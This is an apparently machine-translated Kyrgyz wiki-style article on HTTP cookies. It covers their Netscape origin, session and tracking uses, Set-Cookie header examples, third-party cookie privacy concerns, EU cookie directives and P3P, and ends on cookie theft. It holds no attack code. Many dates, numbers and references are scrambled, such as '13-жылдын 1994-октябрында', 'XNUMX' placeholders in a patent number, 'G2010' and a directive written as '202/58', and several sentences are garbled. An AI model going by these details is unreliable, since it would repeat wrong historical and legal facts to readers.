in Аныктамалар, Wiki

Интернет куки: бул эмне? Аныктама, келип чыгышы, түрлөрү жана купуялуулук

Куки кандай роль ойнойт, ал эмне жана кукилердин кандай түрлөрү бар? 🍪

56.3k Views 384 добуш

Интернет куки: бул эмне? Аныктама, келип чыгышы, түрлөрү жана купуялуулук
Интернет куки: бул эмне? Аныктама, келип чыгышы, түрлөрү жана купуялуулук

Un cookie же веб куки (же печенье, катары кыскартылган күбө Квебекте) HTTP байланыш протоколу менен HTTP сервери HTTP кардарына жөнөтүлгөн маалыматтын ырааттуулугу катары аныкталат, акыркысы белгилүү бир шарттарда ошол эле HTTP сервери суралган сайын кайтарып берет.

Cookie а дегенге барабар терминалда сакталган кичинекей текст файлы интернет колдонуучусунун. 20 жылдан ашык убакыттан бери бар, алар веб-сайтты иштеп чыгуучуларга навигацияны жеңилдетүү жана белгилүү бир функцияларды колдонуу үчүн колдонуучу маалыматтарын сактоого мүмкүнчүлүк берет. Cookie файлдары ар дайым аздыр-көптүр талаштуу болуп келген, анткени алар үчүнчү жактар ​​тарабынан пайдаланылышы мүмкүн болгон жеке маалыматты камтыйт.

Ал веб-сервер тарабынан веб-браузерге HTTP аталышы катары жөнөтүлөт, ал серверге кирген сайын аны өзгөрүүсүз кайтарат. Cookie үчүн колдонсо болот аутентификация, сессия (мамлекеттик тейлөө), жана үчүн колдонуучу жөнүндө конкреттүү маалыматты сактоо, мисалы, сайттын артыкчылыктары же электрондук соода арабасынын мазмуну. Куки термини андан келип чыккан сыйкырдуу печенье, UNIX эсептөөлөрүндө белгилүү концепция, браузердин кукилеринин идеясын жана аталышын шыктандырган. Кукилерге бир нече альтернативалар бар, алардын ар бири өз колдонуусу, артыкчылыктары жана кемчиликтери бар.

Жөнөкөй текст файлдары болгондуктан, кукилер аткарылбайт. Алар эмес шпиондук программалар да, вирустар да эмес, кээ бир сайттардагы кукилерди көптөгөн антивирустук программалар аныктаса да, алар колдонуучуларга бир нече сайтка киргенде байкоо жүргүзүүгө мүмкүндүк берет. 

Көпчүлүк заманбап браузерлер колдонуучуларга мүмкүнчүлүк берет кукилерди кабыл алуу же четке кагуу жөнүндө чечим кабыл алат. Колдонуучулар да мүмкүн cookie файлдары канча убакыт сакталаарын тандаңыз. Бирок, кукилерди толугу менен четке кагуу кээ бир сайттарды жараксыз кылат. Мисалы, эсептик дайындарды (колдонуучунун аты жана сырсөз) колдонуу менен кирүүнү талап кылган арабаларды же сайттарды сактаңыз.

Мазмуну

журналды

мөөнөт куки англис термининен келип чыккан сыйкырдуу печенье, бул программа кабыл алган жана өзгөрүүсүз кайтарылган маалыматтар пакети. Cookie файлдары IT тармагында мурунтан эле колдонулган Лу Монтулли аларды веб-байланыштарда колдонуу идеясы бар болчу 1994-жылдын июнь айында. Ошол учурда ал Netscape Communications компаниясында иштеген, ал кардар үчүн электрондук коммерция тиркемесин иштеп чыккан. Cookie файлдары дүкөндүн виртуалдык сатып алуу корзинасын ишке ашыруунун ишенимдүүлүгүнүн көйгөйүн чечти.

Джон Джаннандреа жана Лу Монтулли ошол эле жылы Netscape'тин биринчи куки спецификациясын жазышкан. Mosaic Netscape 0.9 бета версиясы, 13-жылдын 1994-октябрында чыгарылган, интеграцияланган куки технологиясы (постту караңыз). Кукилерди биринчи (эксперименталдык эмес) колдонуу Netscape веб-сайтынын коноктору бул сайтка мурда кирген-келбегенин аныктоо болгон. Монтулли 1995-жылы куки технологиясына патентке арыз берген жана АКШнын 5774670 XNUMX XNUMX патенти берилген. 1998-жылы берилген.

0.9-жылы Netscape 1994 бетада ишке ашырылгандан кийин, кукилер 2-жылдын октябрында чыгарылган Internet Explorer 1995ге интеграцияланган.

Кукилерди киргизүү коомчулукка кеңири белгилүү боло элек. Атап айтканда, cookie файлдары браузердин жөндөөлөрүндө демейки боюнча кабыл алынган жана колдонуучуларга алардын бар экендиги жөнүндө кабардар болгон эмес. Кээ бир адамдар кукилердин бар экенин 1995-жылдын биринчи кварталында билишкен, бирок жалпы коомчулук Financial Times 12-жылдын 1996-февралында макала жарыялагандан кийин гана пайда болгон. Ошол эле жылы кукилер массалык маалымат каражаттарынын көңүлүн бурган. мүмкүн купуялык кийлигишүүлөрдүн себеби. Кукилер темасы 1996 жана 1997-жылдары Американын Федералдык Соода Комиссиясынын эки кеңешмесинде талкууланган.

Кукилердин расмий спецификациясын иштеп чыгуу буга чейин эле жүрүп жаткан. Расмий спецификациянын биринчи талкуулары 1995-жылдын апрелинде www-talk почта тизмесинде болгон. Атайын IETF жумушчу тобу түзүлдү. HTTP транзакцияларына мамлекетти киргизүү боюнча эки альтернативалуу сунуш Брайан Белендорф жана Дэвид Кристол тарабынан сунушталган, бирок Кристол өзү жетектеген топ Netscapeтин спецификациясын баштапкы чекит катары колдонууну чечти. 1996-жылдын февралында жумушчу топ үчүнчү тараптын кукилери купуялуулукка олуттуу коркунуч экенин аныктаган. Топ тарабынан өндүрүлгөн спецификация акыры катары жарыяланды RFC 2109.

2014-жылдын аягынан баштап биз көптөгөн сайттарда кукилер тууралуу баннерди көрүп жатабыз. Жок дегенде бир браузер кеңейтүүсү бар баннер көрсөтүлгөн эмес.

Cookie файлдарынын түрлөрү жана колдонулушу

Сессияны башкаруу

Cookie файлдары навигация учурунда, ошондой эле бир нече жолу барганда колдонуучунун маалыматтарын сактоо үчүн колдонулушу мүмкүн. Cookie файлдары электрондук соода арабаларын ишке ашыруунун каражатын камсыз кылуу үчүн киргизилген, бул виртуалдык түзүлүш, анда колдонуучу сайтты карап жатканда сатып алгысы келген нерселерди топтой алат.

Бул күндөрдө, арабалар сыяктуу колдонмолор анын ордуна серверде маалымат базасындагы нерселердин тизмесин сакташат, бул жакшыраак; аларды кукиге сактоого караганда. Веб сервер уникалдуу сеанс идентификаторун камтыган куки жөнөтөт. Андан кийин веб-браузер бул сеанс идентификаторун ар бир кийинки суроо-талапка кайтарып берет жана себеттеги нерселер сакталат жана ушул эле уникалдуу сеанс ID менен байланышкан.

Кукилерди тез-тез колдонуу эсептик дайындарды колдонуу менен сайтка кирүү үчүн пайдалуу. Кыскача айтканда, веб-сервер адегенде уникалдуу сеанс идентификаторун камтыган куки жөнөтөт. Андан кийин колдонуучулар өздөрүнүн эсептик дайындарын беришет (көбүнчө колдонуучу аты жана сырсөз). Андан кийин веб-тиркеме сессиянын аныктыгын текшерип, колдонуучуга кызматка кирүү мүмкүнчүлүгүн берет.

Персоналдаштыруу

Cookies сайттын колдонуучусу тууралуу маалыматты эстеп калуу үчүн колдонулушу мүмкүн, келечекте ага ылайыктуу мазмунду көрсөтүү. Мисалы, веб-сервер ошол веб-сайтка кирүү үчүн колдонулган акыркы колдонуучу атын камтыган cookie файлын жөнөтө алат, ошондуктан колдонуучунун аты келечектеги сапарларда алдын ала толтурулат.

Көптөгөн веб-сайттар колдонуучунун каалоосуна жараша жекелештирүү үчүн кукилерди колдонушат. Колдонуучулар өз каалоолорун формада тандап, серверге тапшырышат. Сервер кукидеги артыкчылыктарды коддойт жана аны кайра браузерге жөнөтөт. Кийинчерээк, колдонуучу бул сайттын барагына кирген сайын, браузер кукилерди, демек, артыкчылыктардын тизмесин кайтарат; сервер андан кийин баракты колдонуучунун каалоосуна жараша ыңгайлаштыра алат. Мисалы, Wikipedia веб-сайты өз колдонуучуларына өздөрү каалаган сайттын терисин тандоого мүмкүнчүлүк берет. Google издөө системасы өз колдонуучуларына (алар катталбаган болсо да) ар бир жыйынтык бетинде көргүсү келген натыйжалардын санын тандоого мүмкүнчүлүк берет.

Көз салуу

Көз салуу кукилери интернет колдонуучуларынын серептөө адаттарына көз салуу үчүн колдонулат. Муну жарым-жартылай компьютердин IP дарегин колдонуу менен барак үчүн суроо-талап же кардар ар бир сурам менен жөнөтүүчү 'referrer' HTTP башын колдонуу менен жасоого болот, бирок кукилер көбүрөөк тактыкка жол ачат. Муну төмөнкү мисалдагыдай кылса болот:

  1. Эгерде колдонуучу сайттын баракчасын чакырса жана суроо-талапта куки жок болсо, сервер бул колдонуучу кирген биринчи барак деп эсептейт. Андан кийин сервер кокус сапты түзүп, аны суралган баракча менен бирге браузерге жөнөтөт.
  2. Ушул учурдан тартып, cookie файлы сайттын жаңы барагы чакырылган сайын браузер тарабынан автоматтык түрдө жөнөтүлөт. Сервер баракты адаттагыдай эле жөнөтөт, бирок ошол эле учурда аталган барактын URL дарегин, суроо-талаптын күнүн, убактысын жана куки файлын журналга киргизет.

Журнал файлын карап, анда колдонуучу кайсы баракчаларга жана кандай тартипте киргенин көрүүгө болот. Мисалы, эгер файл id=abc куки аркылуу жасалган бир нече суроону камтыса, бул бардык суроо-талаптар бир эле колдонуучудан келгендигин аныкташы мүмкүн. Суралган URL, суроо менен байланышкан дата жана убакыт колдонуучунун серептөөсүнө көз салууга мүмкүндүк берет.

Төмөндө түшүндүрүлгөн үчүнчү тараптын кукилери жана веб-маяктары ар кандай сайттарда көз салууну кошумчалайт. Бир сайтка көз салуу жалпысынан статистикалык максаттар үчүн колдонулат. Тескерисинче, үчүнчү тараптын кукилерин колдонуп, ар кандай сайттар боюнча көз салуу көбүнчө жарнама компаниялары тарабынан анонимдүү колдонуучу профилдерин түзүү үчүн колдонулат (андан кийин алар колдонуучуга кайсы жарнамалар көрсөтүлүшү керектигин аныктоо үчүн жана ага ушул жарнактарга туура келген электрондук каттарды жөнөтүү үчүн колдонулат — SPAM ).

Кукилерге көз салуу колдонуучунун купуялыгына кол салуу коркунучу, бирок аларды оңой эле жок кылса болот. Көпчүлүк заманбап браузерлер тиркемени жабууда туруктуу кукилерди автоматтык түрдө жок кылуу опциясын камтыйт.

Үчүнчү тараптын кукилери

Веб баракчадагы сүрөттөр жана башка объекттер баракты жайгаштырган серверден башка серверлерде болушу мүмкүн. Баракты көрсөтүү үчүн браузер бул объекттердин баарын жүктөйт. Көпчүлүк веб-сайттар ар кандай булактардан алынган маалыматтарды камтыйт. Мисалы, браузериңизге www.example.com дегенди терсеңиз, көп учурда барактын бир бөлүгүндө ар кандай булактардан, башкача айтканда, www. .example.com доменинен башка доменден келген объекттер же жарнамалар болот. "Биринчи" тараптын кукилери браузердин дарек тилкесинде көрсөтүлгөн домен тарабынан коюлган кукилер. Үчүнчү тараптын кукилери башка доменден келген барак объекттеринин бири тарабынан коюлат.

Демейки боюнча, Mozilla Firefox, Microsoft Internet Explorer жана Opera сыяктуу браузерлер үчүнчү тараптын кукилерин кабыл алышат, бирок колдонуучулар аларды бөгөттөө үчүн браузердин параметрлериндеги орнотууларды өзгөртө алышат. Веб функцияларын иштеткен үчүнчү тараптын кукилерине мүнөздүү коопсуздук коркунучу жок, бирок алар колдонуучуларга көз салуу үчүн да колдонулат. сайттан сайтка.

Google Chrome, анын ичинде бардык браузерлер үчүн жеткиликтүү Ghostery сыяктуу куралдар үчүнчү тараптардын ортосундагы алмашууларды бөгөттөй алат.

Ишке ашыруу

Веб браузер менен веб-баракчаны жайгаштырган сервердин мүмкүн болгон өз ара аракеттенүүсү. Сервер браузерге cookie файлын жөнөтөт, ал эми браузер башка баракты чакырганда аны кайра жөнөтөт.
Веб браузер менен веб-баракчаны жайгаштырган сервердин мүмкүн болгон өз ара аракеттенүүсү. Сервер браузерге cookie файлын жөнөтөт, ал эми браузер башка баракты чакырганда аны кайра жөнөтөт.

Cookie файлдары веб-сервер тарабынан браузерге жөнөтүлгөн майда маалыматтар. Браузер аларды серверге өзгөрүүсүз кайтарып берет, башкача айтканда, жарандыгы жок HTTP транзакциясына абалды (өткөн окуялардын эс тутумун) киргизет. Кукисиз, веб-баракчаны же веб-баракчанын компонентин ар бир издөө бир эле сайтка жасалган башка суроо-талаптардан көз каранды эмес, өзүнчө окуя болуп саналат. Веб сервер тарабынан коюла тургандан тышкары, cookie файлдары браузер тарабынан колдоого жана уруксат берилсе, JavaScript сыяктуу скрипт тилдери аркылуу да коюлушу мүмкүн.

Расмий cookie спецификациясы браузерлер кукилердин минималдуу санын сактап жана кайра жөнөтө алышы керектигин сунуштайт. Тактап айтканда, браузер ар бири төрт килобайттан кеминде 300 куки жана бир сервер же домен үчүн кеминде 20 куки сактай алышы керек.

3.1-бөлүмүнө ылайык RFC 2965, куки аттары регистрге сезимтал эмес.

Куки анын жарактуулук мөөнөтүн көрсөтө алат, бул учурда куки ушул күнү жок кылынат. Эгерде кукиде жарактуулук мөөнөтү көрсөтүлбөсө, колдонуучу браузерден чыккандан кийин куки жок кылынат. Ошондуктан, жарактуулук мөөнөтүн көрсөтүү cookie файлдарын бир нече сеанстар аркылуу сактап калуунун бир жолу. Ушул себептен улам, жарактуулук мөөнөтү менен кукилер деп айтылат туруктуу. Мисал тиркеме: чекене сайт колдонуучулардын корзинага салган нерселерди жаздыруу үчүн туруктуу кукилерди колдонушу мүмкүн (чындыгында куки сиздин компьютериңизде эмес, сатуу сайтындагы маалымат базасында сакталган жазууну билдириши мүмкүн) . Бул аркылуу, эгерде колдонуучулар сатып алуу жасабастан браузерин таштап, кийинчерээк ага кайтып барышса, алар кайра арабага керектүү нерселерди таба алышат. Эгерде бул cookie файлдары жарактуулук мөөнөтүн бербесе, браузер жабылганда алардын мөөнөтү бүтүп, себеттин мазмуну боюнча маалымат жоголмок.

Cookie файлдары аларды түзгөн сервердеги белгилүү бир домен, субдомен же жол менен чектелиши мүмкүн.

Веб баракчаларды өткөрүү HyperText Transfer Protocol (HTTP) аркылуу ишке ашырылат. Cookie файлдарын этибарга албай, браузерлер веб-серверлердин барагын чакырып, аларга кыска текстти жөнөтүшөт HTTP сурамы. Мисалы, www.example.org/index.html баракчасына кирүү үчүн браузерлер www.example.org серверине туташып, төмөнкүдөй суроону жөнөтүшөт:

GET /index.html HTTP/1.1Host: www.example.org
NavigatorServer

Сервер талап кылынган баракты жөнөтүү менен жооп берет, анын алдында окшош текст, бүтүндөй чакырылат HTTP жооп. Бул пакетте браузерге кукилерди сактоону буйруган саптар болушу мүмкүн:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(HTML бети)
NavigatorServer

Эгерде сервер браузерден куки сакташын кааласа, сервер Set-Cookie линиясын гана жөнөтөт. Set-Cookie – бул браузерге name=value сабын сактоого жана аны серверге келечектеги бардык суроо-талаптарда кайтарууга өтүнүч. Браузер cookie файлдарын колдосо жана cookie файлдары браузердин параметрлеринде иштетилсе, куки ошол эле серверге жасалган бардык кийинки суроо-талаптарга кошулат. Мисалы, браузер www.example.org/news.html баракчасын www.example.org серверине төмөнкү суроону жөнөтүү менен чакырат:

GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueКабыл алуу: */*
NavigatorServer

Бул ошол эле серверден башка баракка суроо жана жогорудагы биринчиден айырмаланып турат, анткени анда сервер браузерге мурда жөнөтүлгөн сап камтылган. Бул каражаттын аркасында сервер бул сурам мурункуга байланышканын билет. Сервер чакырылган баракты жөнөтүү, ошондой эле ага башка кукилерди кошуу менен жооп берет.

Cookie файлынын маанисин сервер жаңы сапты жөнөтүү аркылуу өзгөртүшү мүмкүн Set-Cookie: name=new_value чалуу бетине жооп катары. Андан кийин браузер эски маанини жаңысына алмаштырат.

Set-Cookie сызыгы адатта HTTP сервери тарабынан эмес, CGI программасы же башка скрипт тили тарабынан түзүлөт. HTTP сервери (мисалы: Apache) программанын натыйжасын гана (кукилерди камтыган аталыштын алдында турган документ) браузерге өткөрүп берет.

Cookie файлдары JavaScript же браузерде иштеген башка ушул сыяктуу тилдер аркылуу, башкача айтканда, сервер тарапта эмес, кардар тарабында орнотулушу мүмкүн. JavaScript'те документ.cookie объекти бул максат үчүн колдонулат. Мисалы, document.cookie = "temperature=20" билдирүүсү "температура" деп аталган жана 20 мааниси менен куки жаратат.

Атрибуттары бар cookie файлын орноткон google.com сайтынан HTTP жооптун мисалы.
Атрибуттары бар cookie файлын орноткон google.com сайтынан HTTP жооптун мисалы.

Кукиде ат/маани жупунан тышкары жарактуулук мөөнөтү, жол, домендик аталыш жана арналган туташуу түрү, б.а. кадимки же шифрленген болушу мүмкүн. RFC 2965 ошондой эле cookie файлдарында милдеттүү версия номери болушу керек экенин аныктайт, бирок бул жалпысынан алынып салынган. Бул берилиштер бөлүктөрү name=new_value жупка ылайык жана чекиттүү үтүр менен бөлүнгөн. Мисалы, cookie сервер тарабынан Set-Cookie сызыгын жөнөтүү аркылуу түзүлүшү мүмкүн: name=new_value; мөөнөтү = дата; path=/; domain=.example.org.

Cookie файлдарынын мөөнөтү бүтөт жана төмөнкү учурларда браузер тарабынан серверге жөнөтүлбөйт:

  • Браузер жабылганда, куки туруктуу болбосо.
  • Cookie файлынын жарактуулук мөөнөтү өткөндө.
  • Кукилердин жарактуулук мөөнөтү (сервер же скрипт тарабынан) өткөн күнгө өзгөртүлгөндө.
  • Колдонуучунун талабы боюнча браузер кукилерди жок кылганда.

Үчүнчү жагдай серверлерге же скрипттерге кукилерди ачык түрдө жок кылууга мүмкүндүк берет. Мазмун жөндөөлөрүнө кирүү аркылуу белгилүү бир cookie файлынын жарактуулук мөөнөтүн билүү үчүн Google Chrome веб-браузери менен мүмкүн экенин эске алыңыз. Компьютерде сакталган куки, аны өчүрүү үчүн эч кандай жол-жоболор аткарылбаса, анда бир нече ондогон жылдар бою сакталып калышы мүмкүн.

Стереотиптер

Алар Интернетке киргизилгенден бери кукилер жөнүндө көптөгөн идеялар Интернетте жана массалык маалымат каражаттарында тараган. 1998-жылы, CIAC, Америка Кошмо Штаттарынын Энергетика министрлигинин компьютердик инциденттерди көзөмөлдөө тобу, cookie файлдарынын коопсуздугунун алсыздыктары "негизинен жок" экенин аныктап, "сиздин зыяратыңыздын келип чыгышы жана сиз кирген веб-баракчалардын чоо-жайы жөнүндө маалымат" деп түшүндүргөн. веб-серверлердин журнал файлдарында мурунтан эле бар». 2005-жылы Jupiter Research изилдөөнүн жыйынтыгын жарыялады, анда респонденттердин олуттуу пайызы төмөнкүдөй билдирүүлөрдү карашты:

  • Cookies окшош вирус, алар колдонуучулардын катуу дисктерин жугузат.
  • Cookies жаратат калкыма.
  • Cookies жөнөтүү үчүн колдонулат спам.
  • Cookie файлдары жарнама үчүн гана колдонулат.

Cookie файлдары колдонуучунун компьютеринен маалыматты өчүрө албайт же окуй албайт. Бирок, cookie файлдары берилген сайтта же сайттардын топтомунда колдонуучу кирген веб-баракчаларды аныктоого мүмкүндүк берет. Бул маалымат колдонуучунун профилинде чогултулушу мүмкүн, аны колдонууга же үчүнчү жактарга кайра сатууга болот, бул купуялыкка олуттуу көйгөйлөрдү жаратышы мүмкүн. Кээ бир профилдер анонимдүү болуп саналат, анткени аларда жеке маалымат жок, бирок мындай профилдер да күмөндүү болушу мүмкүн.

Ушул эле изилдөөгө ылайык, интернет колдонуучулардын чоң пайызы кукилерди кантип жок кылууну билишпейт. Адамдардын cookie файлдарына ишенбөө себептеринин бири - бул кээ бир сайттар кукилердин жеке аныктоочу аспектисин кыянаттык менен пайдаланып, бул маалыматты башка булактар ​​менен бөлүшүшкөн. Спам деп эсептелген максаттуу жарнаманын жана талап кылынбаган электрондук почтанын чоң пайызы кукилерге көз салуудан алынган маалыматтан келип чыгат.

Браузер орнотуулары

Көпчүлүк браузерлер кукилерди колдойт жана колдонуучуга аларды өчүрүүгө мүмкүнчүлүк берет. Эң кеңири таралган варианттар:

  • Кукилерди толугу менен иштетиңиз же өчүрүңүз, алар дайыма кабыл алынат же бөгөттөлөт.
  • Браузердин дарек тилкесине javascript: alert(document.cookie) киргизүү менен колдонуучуга берилген баракта активдүү кукилерди көрүүгө уруксат бериңиз. Кээ бир браузерлер колдонуучу үчүн cookie менеджерин камтыйт, ал учурда браузерде сакталган кукилерди көрүп жана тандап жок кыла алат.

Көпчүлүк браузерлер ошондой эле кукилерди камтыган жеке маалыматтарды толугу менен жок кылууга мүмкүндүк берет. Cookie уруксаттарын көзөмөлдөө үчүн кошумча модулдар да бар.

Купуялык жана үчүнчү тараптын кукилери

Бул ойдон чыгарылган мисалда, бир жарнамалык компания эки веб-сайтка баннерлерди жайгаштырган. Баннерлерди өзүнүн серверлеринде жайгаштыруу жана үчүнчү тараптын кукилерин колдонуу менен, жарнамалык компания бул эки сайт аркылуу колдонуучунун навигациясын көзөмөлдөй алат.

Cookie файлдары веб колдонуучулардын купуялуулугу жана анонимдүүлүгү үчүн маанилүү кесепеттерге ээ. Cookie файлдары аларды орноткон серверге же ошол эле Интернет доменине таандык серверге гана кайра жөнөтүлгөнү менен, веб-баракча башка домендерге таандык серверлерде сакталган сүрөттөрдү же башка компоненттерди камтышы мүмкүн. Бул тышкы компоненттерди калыбына келтирүү учурунда коюлган кукилер деп аталат үчүнчү тараптын кукилери. Бул керексиз калкыма терезелерден кукилерди камтыйт.

Жарнамалык компаниялар үчүнчү тараптын кукилерин колдонуучуларды алар кирген ар кандай сайттарда көзөмөлдөө үчүн колдонушат. Тактап айтканда, жарнамалык компания колдонуучуну жарнамалык сүрөттөрдү же көз салуу пикселин жайгаштырган бардык баракчалар боюнча көзөмөлдөй алат. Колдонуучу кирген барактарды билүү жарнамалык компанияга колдонуучунун жарнамалык артыкчылыктарын максаттуу кылууга мүмкүндүк берет.

Колдонуучунун профилин түзүү мүмкүнчүлүгү айрымдар тарабынан купуялыкка кол салуу катары каралат, өзгөчө, үчүнчү тараптын кукилери аркылуу ар кандай домендерде байкоо жүргүзүлсө. Ушул себептен улам, кээ бир өлкөлөрдө cookie мыйзамдары бар.

Америка Кошмо Штаттарынын өкмөтү 2000-жылы Ак үйдүн Баңгизат саясаты боюнча кеңсеси баңги затынын онлайн жарнактарын көргөн колдонуучулардын компьютерлерине көз салуу үчүн кукилерди колдонуп жүргөнү аныкталгандан кийин кукилерди жайгаштыруу боюнча катуу эрежелерди ишке ашырган. 2002-жылы жеке турмуштун активисти Дэниел Брандт ЦРУ анын веб-сайттарына кирген компьютерлерде туруктуу кукилерди калтырганын аныктаган. Бул бузуу жөнүндө кабардар болгондон кийин, ЦРУ бул кукилер атайылап жөнөтүлбөгөнүн жарыялап, аларды коюуну токтотту. 25-жылдын 2005-декабрында Брандт Улуттук коопсуздук агенттиги (NSA) программалык камсыздоону жаңыртуудан улам коноктордун компьютерлерине эки туруктуу cookie файлдарын калтырганын аныктаган. Кабарлангандан кийин, NSA кукилерди дароо өчүрдү.

Улуу Британияда, Cookie мыйзамы ", 25-жылдын 2012-майында күчүнө кирген, сайттарды өз ниетин билдирүүгө милдеттендирет, бул колдонуучуларга Интернетте алардын изин калтырууну же калтырбоосун тандоого мүмкүндүк берет. Ошентип, алар жарнамалык максаттуу корголушу мүмкүн. Бирок, ылайык Guardian, Интернет колдонуучулардын макулдугу сөзсүз түрдө ачык эмес; өзгөртүүлөр аны кабыл алуу, колдонуучунун макулдугу шарттарына киргизилген ошентип билдирет.

Директива 2002/58 купуялуулук боюнча

Директивасы 202/58 купуялык жана электрондук байланыш, кукилерди колдонуу боюнча эрежелерди камтыйт. Атап айтканда, ушул директиванын 5-беренесинин 3-пунктунда колдонуучунун компьютеринде маалыматтарды (мисалы, кукилер) сактоо төмөнкү учурларда гана жүргүзүлүшүн талап кылат:

  • колдонуучуга маалыматтар кандайча колдонулуп жаткандыгы жөнүндө маалымат берилет;
  • колдонуучуга бул сактоо операциясынан баш тартуу мүмкүнчүлүгү берилет. Бирок бул беренеде техникалык себептер боюнча маалыматтарды сактоо бул мыйзамдан бошотулат деп да жазылган.

2003-жылдын октябрынан тартып ишке ашырыла тургандыктан, директива 2004-жылдын декабрь айындагы отчетуна ылайык иш жүзүндө өтө эле толук эмес ишке ашырылган, анда ошондой эле айрым мүчө мамлекеттер (Словакия, Латвия, Греция, Бельгия жана Люксембург) алиге чейин бул жобону которуша электиги белгиленген. ички мыйзамдарга директива.

29-жылы G2010 пикири боюнча, интернет колдонуучунун ачык макулдугу боюнча кукилерди жүрүм-турумдук жарнамалык максаттарда колдонууну өзгөчө шарттаган бул директива өтө начар колдонулууда. Чындыгында, көпчүлүк сайттар муну директивага туура келбеген ыкма менен жасашат, "кукилерди" колдонуу жөнүндө маалымат бербестен, "техникалык" кукилерди айырмалабастан, жөнөкөй "баннер" менен чектешет. "көзөмөлдөөчү" кукилерди, ошондой эле техникалык кукилерди (мисалы, корзинаны башкаруу кукилерин) сактоону каалаган колдонуучуга чыныгы тандоону сунуштоо жана "көзөмөлдөөдөн" баш тартуу. Чынында, көптөгөн сайттар кукилерден баш тартса, туура иштебейт, бул 2002/58 директивасына же 95/46 директивасына (Жеке маалыматтарды коргоо) туура келбейт.

Директива 2009/136/CE

Бул материал 2009-жылдын 136-ноябрындагы 25/2009/EC Директивасы менен жаңыртылган, анда "абоненттин же колдонуучунун терминалдык жабдууларында маалыматты сактоого же буга чейин сакталган маалыматка жетүү мүмкүнчүлүгүн алууга уруксат берилген шартта гана уруксат берилет" деп айтылат. Абонент же колдонуучу 95/46/EC Директивасына ылайык, кайра иштетүүнүн максаттары боюнча башкалардын ортосунда ачык жана толук маалыматты алгандан кийин өзүнүн макулдугун берген. Демек, жаңы директива Интернет колдонуучунун компьютерине кукилерди жайгаштырууга чейинки милдеттенмелерди күчөтөт.

Директиванын алдын ала кароолорунда, европалык мыйзам чыгаруучу, бирок мындай деп белгилейт: "95/46/EC Директивасынын тиешелүү жоболоруна ылайык, техникалык жактан мүмкүн болгон жана натыйжалуу болгон учурда, иштетүүгө колдонуучунун макулдугу төмөнкү аркылуу билдирилиши мүмкүн. браузердин же башка тиркеменин тиешелүү орнотууларын колдонуу”. Бирок, чындыгында, бүгүнкү күнгө чейин бир дагы браузер колдонуучунун тандоосуна калтырылышы керек болгон негизги техникалык кукилерди кошумча кукилерден ажыратууга мүмкүндүк бербейт.

Бул жаңы директиваны Бельгиянын депутаттары 2012-жылдын июль айында өткөрүп беришкен. 2014-жылдагы изилдөө көрсөткөндөй, депутаттар да колдонууга аракет кылышат. директиванын чектөөлөрү.

P3P

P3P спецификациясы сервердин купуялык саясатын билдирүү мүмкүнчүлүгүн камтыйт, ал кандай маалыматты жана кандай максатта чогултарын аныктайт. Бул саясаттар кукилерди колдонуу менен чогултулган маалыматты колдонууну камтыйт (бирок алар менен чектелбейт). P3P аныктамаларына ылайык, браузер купуялык саясатын колдонуучунун каалоосу менен салыштырып же колдонуучудан сурап, сервер жарыялаган купуялык саясатынын купуялык билдирүүсүн көрсөтүү менен кукилерди кабыл алат же четке кага алат.

Көптөгөн браузерлер, анын ичинде Apple Safari жана Microsoft Internet Explorer 6 жана 7 версиялары, браузерге үчүнчү тараптын куки сактагычын кабыл алууну аныктоого мүмкүндүк берген P3Pди колдойт. Opera браузери колдонуучуларга үчүнчү тараптын кукилеринен баш тартууга жана Интернет домендери үчүн глобалдык жана атайын коопсуздук профилин түзүүгө мүмкүндүк берет. Mozilla Firefox 2-версиясы P3P колдоосун алып салды, бирок аны 3-версиясында калыбына келтирди.

Үчүнчү тараптын кукилери көпчүлүк браузерлер тарабынан купуялуулукту жогорулатуу жана жарнамага көз салууну азайтуу үчүн, колдонуучунун веб тажрыйбасына терс таасирин тийгизбестен бөгөттөлүшү мүмкүн. Көптөгөн жарнамалык агенттиктер бир вариантты сунушташат баш тартуу максаттуу жарнамага, браузерде жалпы кукилерди орнотуу менен, бул таргетингди өчүрөт, бирок мындай чечим аны урматтаганда иш жүзүндө эффективдүү эмес, анткени бул жалпы куки колдонуучу бул кукилерди жок кылганда өчүрүлөт, бул оптимизацияны жокко чыгарат. чечим чыгаруу.

Кукилердин кемчиликтери

Купуялык маселелеринен тышкары, кукилерде кээ бир техникалык кемчиликтер да бар. Атап айтканда, алар колдонуучуларды так аныктай бербейт, алар көп санда болгондо сайттын иштешин жайлатышы мүмкүн, алар коопсуздук чабуулдары үчүн колдонулушу мүмкүн жана алар мамлекеттик берүүнүн өкүлчүлүгүнө, программалык камсыздоонун архитектуралык стилине карама-каршы келет.

Так эмес идентификация

Эгерде компьютерде бирден ашык браузер колдонулса, алардын ар биринде ар дайым кукилер үчүн өзүнчө сактоо бирдиги болот. Демек, cookie файлдары адамды аныктабайт, бирок колдонуучу аккаунтунун, компьютердин жана веб-браузердин айкалышы. Ошентип, ар бир адам бул эсептерди, компьютерлерди же cookie файлдары бар браузерлерди колдоно алат. Ошо сыяктуу эле, cookie файлдары бир эле колдонуучу аккаунтун, компьютерди жана браузерди бөлүшкөн бир нече колдонуучуларды айырмалабайт, мисалы, "интернет кафелерде" же компьютер ресурстарына эркин кирүү мүмкүнчүлүгүн берген жерде.

Бирок иш жүзүндө бул билдирүү көпчүлүк учурларда туура эмес болуп чыгат, анткени бүгүнкү күндө "жеке" компьютер (же смартфон, же андан да жаманы планшет) негизинен бир адам тарабынан колдонулат.Бул конкреттүү бир адамга багытталган жана чогултулган маалыматтын көлөмү аркылуу, адам "атап айтканда" аныкталбаса да, жекелештирилген максатка жетет.

Куки тармактагы башка компьютер тарабынан уурдалышы мүмкүн.

Кадимки иштөө учурунда кукилер сервер (же бир эле домендеги серверлер тобу) менен колдонуучунун компьютеринин браузеринин ортосунда кайра жөнөтүлөт. Cookie файлдары купуя маалыматтарды (колдонуучунун аты, аутентификация үчүн колдонулган сырсөз ж.б.) камтышы мүмкүн болгондуктан, алардын баалуулуктары башка компьютерлерге жеткиликтүү болбошу керек. Cookie уурдоо - бул кукилерди уруксатсыз үчүнчү тараптын кармап алуу актысы.

